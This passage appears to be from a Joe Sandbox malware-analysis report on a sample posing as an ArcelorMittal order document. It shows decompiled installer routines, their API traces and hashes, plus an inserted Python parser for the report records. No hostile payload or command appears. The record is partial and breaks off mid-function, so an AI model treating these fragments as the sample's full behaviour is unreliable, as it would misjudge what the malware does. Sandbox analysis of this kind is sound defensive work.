                                                • Instruction Fuzzy Hash: 4DD05E73B04100DBCB50DFE8AE08A9D77B5AB80338B24C177E601F25E4DAB8C6509B1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404142(int _a4) {
                                                				struct HWND__* _t2;
                                                				long _t3;
                                                
                                                				_t2 =  *0x7a7a18; // 0x103ae
                                                				if(_t2 != 0) {
                                                					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                					return _t3;
                                                				}
                                                				return _t2;
                                                			}





                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x00404142 0x00404149 0x00404154 0x00000000 0x00404154 0x0040415a

                                                APIs
                                                • SendMessageW.USER32(000103AE,00000000,00000000,00000000), ref: 00404154
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
                                                • Instruction ID: cc05bc227ed13b811f407cb85d7c2569ddbf91d4c39e4ff41bb473b50526893a
                                                • Opcode Fuzzy Hash: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
                                                • Instruction Fuzzy Hash: ABC09B71744700BBEA10DF649D49F1777547BA4751F14C8297351F51D0C674D450D71C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040412B(int _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SendMessageW( *0x7a8a48, 0x28, _a4, 1); // executed; 0x28 == WM_NEXTDLGCTL, non-zero lParam means wParam is the HWND to receive focus
                                                				return _t2;
                                                			}




                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x00404139 0x0040413f

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
                                                • Instruction ID: d373e4bc0d40e7382ef1e11b314aa0fa38d31fe2e2f9466a5520a1a67522e00c
                                                • Opcode Fuzzy Hash: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
                                                • Instruction Fuzzy Hash: AFB01235180A00BBDE514B00FE09F457E62F7AC701F00C429B340240F0CEB200B0DB09
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403235(long _a4) {
                                                				long _t2;
                                                
                                                				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed; lpDistanceToMoveHigh NULL, dwMoveMethod 0 == FILE_BEGIN
                                                				return _t2;
                                                			}




                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x00403243 0x00403249

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403517,?), ref: 00403243
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404118(int _a4) {
                                                				int _t2;
                                                
                                                				_t2 = EnableWindow( *0x7a1f3c, _a4); // executed
                                                				return _t2;
                                                			}




                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x00404122 0x00404128

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403EF0), ref: 00404122
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
                                                • Instruction ID: 444c84cbde4606a42b11029cb4d9c6b68aea771a74e0ff2f6fd8e0518f780766
                                                • Opcode Fuzzy Hash: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
                                                • Instruction Fuzzy Hash: ACA0113A000000AFCF028B80EF08C0ABB22ABE0300B20C03AA280800308B320820FB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004014D7() {
                                                				long _t2;
                                                				void* _t6;
                                                				void* _t10;
                                                
                                                				_t2 = E00402BA2(_t6);
                                                				if(_t2 <= 1) {
                                                					_t2 = 1;
                                                				}
                                                				Sleep(_t2); // executed; delay comes from E00402BA2 and is clamped to a minimum of 1 ms above
                                                				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t10 - 4));
                                                				return 0;
                                                			}






                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x004014d8 0x004014e0 0x004014e4 0x004014e4 0x004014e6 0x00402a4f 0x00402a5b

                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
                                                • Instruction ID: 9fddfdb3ce08ea3f3c8fe9d319431df7e4e0be4ecd303254129af624b9b4f796
                                                • Opcode Fuzzy Hash: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
                                                • Instruction Fuzzy Hash: CBD0C977B141009BD790EFB9AE8986A73A8EB913293248837D902E11A2D97CC811462D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E1000121B() {
                                                				void* _t3;
                                                
                                                				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed; 0x40 == GPTR (GMEM_FIXED | GMEM_ZEROINIT), size is twice the global at 0x1000406c
                                                				return _t3;
                                                			}




                                                Instruction addresses (address column of the disassembly listing; opcode and operand columns were not preserved in this rendering): 0x10001225 0x1000122b

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                Uniqueness

                                                Uniqueness Score: -1.00%
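As an added example for working with this listing (it is not part of the Joe Sandbox report and not Joe Sandbox's own code): a Python parser for the per-function records rendered above. It recovers each function's address, the API calls the trace attributes to it (API name, module, argument column, call-site address), the image base of the memory dump the code came from, the Opcode ID and the Instruction Fuzzy Hash, then groups the result by DLL and by image base and lists records where the callee named in the decompiled C differs from the API the trace attributes the call to (as in E00404118 above, EnableWindow in the C-Code versus KiUserCallbackDispatcher.NTDLL under APIs). The text embedded in SAMPLE_REPORT is a constructed excerpt of three records from this page, trimmed to the lines the parser consumes; the only assumption is that the record layout is the one shown here.

```python
# Parse Joe Sandbox 'C-Code' function records (layout as rendered on this
# page) into structured data and summarise them. Added example, not Joe
# Sandbox code; SAMPLE_REPORT is a constructed excerpt of three records
# from this report, reduced to the lines the parser needs.
import re
from collections import defaultdict

SAMPLE_REPORT = """\
C-Code - Quality: 100%
    E0040159B() {
        _t5 = SetFileAttributesW(E00402BBF(0xfffffff0),  *(_t11 - 0x28)); // executed
    }
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
Memory Dump Source
• Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
• Instruction Fuzzy Hash: 4DD05E73B04100DBCB50DFE8AE08A9D77B5AB80338B24C177E601F25E4DAB8C6509B1E
C-Code - Quality: 100%
    E00404118(int _a4) {
        _t2 = EnableWindow( *0x7a1f3c, _a4); // executed
    }
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403EF0), ref: 00404122
Memory Dump Source
• Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
• Instruction Fuzzy Hash: ACA0113A000000AFCF028B80EF08C0ABB22ABE0300B20C03AA280800308B320820FB08
C-Code - Quality: 100%
    E1000121B() {
        _t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
    }
APIs
• GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
Memory Dump Source
• Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
"""

RECORD_SPLIT = re.compile(r"^C-Code - Quality: \d+%\s*$", re.M)
FUNC_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(", re.M)            # decompiled function header
CALL_RE = re.compile(r"(\w+)\([^;\n]*\); // executed")          # callee shown in the C-Code
API_RE = re.compile(r"^• (\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-F]{8})\s*$", re.M)
BASE_RE = re.compile(r"Offset: ([0-9A-F]{8}), based on PE")
OPCODE_RE = re.compile(r"Opcode ID: ([0-9a-f]{64})")
FUZZY_RE = re.compile(r"Instruction Fuzzy Hash: ([0-9A-F]+)")


def _first(regex, text):
    m = regex.search(text)
    return m.group(1) if m else None


def parse_report(text):
    """One dict per 'C-Code' record; chunks without a function header are skipped."""
    records = []
    for chunk in RECORD_SPLIT.split(text)[1:]:
        name = _first(FUNC_RE, chunk)
        if name is None:
            continue
        base = _first(BASE_RE, chunk)
        records.append({
            "function": name,
            "address": int(name[1:], 16),                 # E0040159B -> 0x0040159B
            "module_base": int(base, 16) if base else None,
            "callee": _first(CALL_RE, chunk),
            "apis": [{"name": n, "module": mod, "args": a.split(","), "ref": int(r, 16)}
                     for n, mod, a, r in API_RE.findall(chunk)],
            "opcode_id": _first(OPCODE_RE, chunk),
            "fuzzy_hash": _first(FUZZY_RE, chunk),
        })
    return records


def apis_by_module(records):
    """DLL the trace attributes each call to -> sorted API names."""
    out = defaultdict(set)
    for rec in records:
        for api in rec["apis"]:
            out[api["module"]].add(api["name"])
    return {mod: sorted(names) for mod, names in out.items()}


def functions_by_image(records):
    """Dump image base -> functions; a second base (0x10000000 here) means the
    code lives in another loaded module, not the executable mapped at 0x00400000."""
    out = defaultdict(list)
    for rec in records:
        out[rec["module_base"]].append(rec["function"])
    return dict(out)


def mismatched_attributions(records):
    """(function, decompiled callee, traced API) where the two names differ."""
    return [(rec["function"], rec["callee"], api["name"])
            for rec in records for api in rec["apis"]
            if rec["callee"] and api["name"] != rec["callee"]]


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for rec in recs:
        print(rec["function"], [f'{a["name"]}@{a["ref"]:08X}' for a in rec["apis"]])
    print(apis_by_module(recs), functions_by_image(recs), mismatched_attributions(recs))
```

Once parsed, the Opcode ID and Instruction Fuzzy Hash fields are the values to key on when looking for the same code in other samples' reports, and the image-base grouping separates the functions recovered from the executable mapped at 0x00400000 from those in the second module dumped at 0x10000000.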

                                                C-Code - Quality: 96%
                                                			E00404B0D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				signed char* _v28;
                                                				long _v32;
                                                				signed int _v40;
                                                				int _v44;
                                                				signed int* _v56;
                                                				signed char* _v60;
                                                				signed int _v64;
                                                				long _v68;
                                                				void* _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t192;
                                                				intOrPtr _t195;
                                                				intOrPtr _t197;
                                                				long _t201;
                                                				signed int _t205;
                                                				signed int _t216;
                                                				void* _t219;
                                                				void* _t220;
                                                				int _t226;
                                                				signed int _t231;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t239;
                                                				signed int _t241;
                                                				signed char _t242;
                                                				signed char _t248;
                                                				void* _t252;
                                                				void* _t254;
                                                				signed char* _t270;
                                                				signed char _t271;
                                                				long _t276;
                                                				int _t282;
                                                				signed int _t283;
                                                				long _t284;
                                                				signed int _t287;
                                                				signed int _t294;
                                                				signed char* _t302;
                                                				struct HWND__* _t306;
                                                				int _t307;
                                                				signed int* _t308;
                                                				int _t309;
                                                				long _t310;
                                                				signed int _t311;
                                                				void* _t313;
                                                				long _t314;
                                                				int _t315;
                                                				signed int _t316;
                                                				void* _t318;
                                                
                                                				_t306 = _a4;
                                                				_v12 = GetDlgItem(_t306, 0x3f9);
                                                				_v8 = GetDlgItem(_t306, 0x408);
                                                				_t318 = SendMessageW;
                                                				_v20 =  *0x7a8a68;
                                                				_t282 = 0;
                                                				_v24 =  *0x7a8a50 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t285 = _a16;
                                                					} else {
                                                						_a12 = _t282;
                                                						_t285 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t285;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                							if(( *0x7a8a59 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != _t282) {
                                                									_t231 = _v16;
                                                									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                									}
                                                									_t232 = _v16;
                                                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                										_t285 = _v20;
                                                										_t233 =  *(_t232 + 0x5c);
                                                										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t285 = 0 | _a8 != 0x00000413;
                                                								_t239 = E00404A5B(_v8, _a8 != 0x413);
                                                								_t311 = _t239;
                                                								if(_t311 >= _t282) {
                                                									_t88 = _v20 + 8; // 0x8
                                                									_t285 = _t239 * 0x818 + _t88;
                                                									_t241 =  *_t285;
                                                									if((_t241 & 0x00000010) == 0) {
                                                										if((_t241 & 0x00000040) == 0) {
                                                											_t242 = _t241 ^ 0x00000001;
                                                										} else {
                                                											_t248 = _t241 ^ 0x00000080;
                                                											if(_t248 >= 0) {
                                                												_t242 = _t248 & 0x000000fe;
                                                											} else {
                                                												_t242 = _t248 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t285 = _t242;
                                                										E0040117D(_t311);
                                                										_a12 = _t311 + 1;
                                                										_a16 =  !( *0x7a8a58) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t285 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, _t282, _t282);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t219 =  *0x7a1f24;
                                                								if(_t219 != _t282) {
                                                									ImageList_Destroy(_t219);
                                                								}
                                                								_t220 =  *0x7a1f38;
                                                								if(_t220 != _t282) {
                                                									GlobalFree(_t220);
                                                								}
                                                								 *0x7a1f24 = _t282;
                                                								 *0x7a1f38 = _t282;
                                                								 *0x7a8aa0 = _t282;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L88:
                                                								if(_a8 == 0x420 && ( *0x7a8a59 & 0x00000001) != 0) {
                                                									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t307);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                								}
                                                								goto L91;
                                                							} else {
                                                								E004011EF(_t285, _t282, _t282);
                                                								_t192 = _a12;
                                                								if(_t192 != _t282) {
                                                									if(_t192 != 0xffffffff) {
                                                										_t192 = _t192 - 1;
                                                									}
                                                									_push(_t192);
                                                									_push(8);
                                                									E00404ADB();
                                                								}
                                                								if(_a16 == _t282) {
                                                									L75:
                                                									E004011EF(_t285, _t282, _t282);
                                                									_v32 =  *0x7a1f38;
                                                									_t195 =  *0x7a8a68;
                                                									_v60 = 0xf030;
                                                									_v20 = _t282;
                                                									if( *0x7a8a6c <= _t282) {
                                                										L86:
                                                										InvalidateRect(_v8, _t282, 1);
                                                										_t197 =  *0x7a7a1c; // 0x8681a6
                                                										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                											E00404A16(0x3ff, 0xfffffffb, E00404A2E(5));
                                                										}
                                                										goto L88;
                                                									}
                                                									_t308 = _t195 + 8;
                                                									do {
                                                										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                										if(_t201 != _t282) {
                                                											_t287 =  *_t308;
                                                											_v68 = _t201;
                                                											_v72 = 8;
                                                											if((_t287 & 0x00000001) != 0) {
                                                												_v72 = 9;
                                                												_v56 =  &(_t308[4]);
                                                												_t308[0] = _t308[0] & 0x000000fe;
                                                											}
                                                											if((_t287 & 0x00000040) == 0) {
                                                												_t205 = (_t287 & 0x00000001) + 1;
                                                												if((_t287 & 0x00000010) != 0) {
                                                													_t205 = _t205 + 3;
                                                												}
                                                											} else {
                                                												_t205 = 3;
                                                											}
                                                											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                										}
                                                										_v20 = _v20 + 1;
                                                										_t308 =  &(_t308[0x206]);
                                                									} while (_v20 <  *0x7a8a6c);
                                                									goto L86;
                                                								} else {
                                                									_t309 = E004012E2( *0x7a1f38);
                                                									E00401299(_t309);
                                                									_t216 = 0;
                                                									_t285 = 0;
                                                									if(_t309 <= _t282) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                										_a16 = _t309;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                											_t285 = _t285 + 1;
                                                										}
                                                										_t216 = _t216 + 1;
                                                									} while (_t216 < _t309);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L91;
                                                						} else {
                                                							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                							if(_t226 == 0xffffffff) {
                                                								goto L91;
                                                							}
                                                							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                								_t310 = 0x20;
                                                							}
                                                							E00401299(_t310);
                                                							SendMessageW(_a4, 0x420, _t282, _t310);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = _t282;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
